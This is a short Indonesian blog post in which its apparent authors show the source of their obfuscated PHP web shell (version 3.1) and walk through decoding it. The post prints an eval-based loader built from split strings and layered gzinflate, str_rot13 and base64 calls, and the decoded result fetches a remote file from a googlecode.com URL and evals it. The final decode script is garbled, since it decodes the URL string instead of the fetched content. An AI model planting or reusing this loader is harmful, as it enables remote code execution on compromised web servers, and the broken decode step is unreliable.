langsung saja kita lihat sourch encode shell saya di versi 3.1
<?phpfunction x($inject){eval("\$z=gz" . "inf" . "la" . "te(s" . "t" . "r_r" . "ot" . "13(ba" . "se" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "de(st" . "r" . "_" . "r" . "o" . "t" . "13(" . "gzi" . "nf" . "lat" . "e(" . "bas" . "e6" . "4_d" . "ec" . "ode(\$inject))))));eval(\$z);");}x("BcHJEkMwAADQD3LQytgOPVmiDEFJIzdaS5Wxpglf3/dcDFDc4D595B+2qTZJTnH07osgbhwsgWs1pusqOlxq5nXn7zyH60hZbh5oDxFcTr+XsqdFkE0gr/avRyMnNOL69LyM1k5gqBddGaeBLVOX1RXWI+yzhoh5AW0deFNnicYBg6BlYVV4D9oB/dDJB1R0bWYawJK1QHZniQPlvtn49gc=");?> yups langsung kita decode1. hapus tanda "." untuk mengetahui alur decodenya
sehingga menjadi:
eval("\$z=gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode(\$inject))))));eval(\$z);"); nah kita sudah tau alurnya sekarang tinggal modifnya
2. modif script di atas menjadi
<?php$decode="BcHJEkMwAADQD3LQytgOPVmiDEFJIzdaS5Wxpglf3/dcDFDc4D595B+2qTZJTnH07osgbhwsgWs1pusqOlxq5nXn7zyH60hZbh5oDxFcTr+XsqdFkE0gr/avRyMnNOL69LyM1k5gqBddGaeBLVOX1RXWI+yzhoh5AW0deFNnicYBg6BlYVV4D9oB/dDJB1R0bWYawJK1QHZniQPlvtn49gc=";$decode=gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($decode))))));echo "<textarea cols=100 row=70 >$decode</textarea>";?> save dengan extensi php lalu buaka di localhost atau yang lainsetelah itu akan keluar hasilnya seperti berikut:$in73ct = "http://injects.googlecode.com/files/sssss.txt"; $inj3ct
= file_get_contents($in73ct); eval(gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($inj3ct))))
))); 3. kita decode lagi agar kelihatan scriptnya dan kita jadikan file baru <?php$in73ct = "http://injects.googlecode.com/files/sssss.txt";$inj3ct
= gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($in73ct))))
)); file_put_contents("decode.php",$inj3ct);?> save dengan extensi php lalu buka jika filenya blank berarti kita berhasil decode untuk melihat hasilnya buka file "decode.php" sekian tutorial dari kamisalam kamiX'1N73CT & S1T1B4RC0D3
Tidak ada komentar:
Posting Komentar